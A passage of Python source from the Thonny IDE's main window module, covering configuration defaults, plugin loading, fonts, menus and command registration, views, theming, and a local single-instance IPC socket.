"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specifying default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._exercise_providers = []
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
from thonny.exercises import ExercisesView
self.add_view(ExercisesView, tr("Exercises"), "ne")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
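# A third-party plugin is simply a module in the "thonnycontrib" namespace package that
# defines load_plugin(); a minimal sketch (module and command names are hypothetical):
#
#   # thonnycontrib/hello.py
#   from thonny import get_workbench
#
#   load_order_key = "zz_hello"   # optional; modules are loaded in this key's order
#
#   def load_plugin():
#       get_workbench().add_command("hello", "tools", "Say hello",
#                                   handler=lambda: print("hello"))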
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
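# Sketch of the client half of this handshake, i.e. what a newer Thonny instance is
# expected to send when delegating its file arguments (simplified, Unix socket case):
#
#   sock = socket.socket(socket.AF_UNIX)
#   sock.connect(thonny.get_ipc_file_path())
#   sock.sendall(repr((secret, sys.argv[1:])).encode("utf-8"))
#   sock.shutdown(socket.SHUT_WR)          # server reads until EOF
#   assert sock.recv(1024).decode("utf-8") == SERVER_SUCCESS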
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
# Main frame functions as
# - a background behind the padding of main_pw; without it OS X leaves a white border
# - a container to be hidden when a view is maximized, and restored when the view goes back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
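# Illustrative call from a plugin (the command id, label, handler, tester and key
# sequence below are hypothetical):
#
#   get_workbench().add_command(
#       "reverse_lines", "edit", "Reverse selected lines",
#       handler=do_reverse, tester=selection_exists,
#       default_sequence="<Control-Alt-r>", group=50,
#   )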
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checkbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or blank needed next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
cls: Class or constructor for the view. Should be callable with a single
argument (the master of the view)
label: Label of the view tab
default_location: Location descriptor. Can be "nw", "w", "sw", "s", "se", "e", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key is None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
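# Illustrative registration from a plugin (the view class is hypothetical):
#
#   get_workbench().add_view(OutlineView, tr("Outline"), "ne", visible_by_default=False)
#
# This creates the "view.OutlineView.visible"/".location"/".position_key" options and a
# toggle entry in the View menu; the view itself is constructed later, when first shown.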
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assign names to the related classes
proxy_class.backend_name = name # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
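# Illustrative theme registration (theme name, parent, settings and image names are
# examples only); settings follow the ttk style API, per-style dicts of "configure"/"map":
#
#   get_workbench().add_ui_theme(
#       "My Flat Dark", "Enhanced Clam",
#       {"TNotebook": {"configure": {"tabposition": "n"}},
#        "Text": {"configure": {"background": "#2d2d2d", "foreground": "#e0e0e0"}}},
#       images={"run-current-script": "run-dark.png"},
#   )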
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def add_exercise_provider(self, name, title, class_, sort_key=None):
self._exercise_providers.append(
{"name": name, "title": title, "class": class_, "sort_key": sort_key or title}
)
def get_exercise_providers(self):
return self._exercise_providers
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, i.e. when the theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
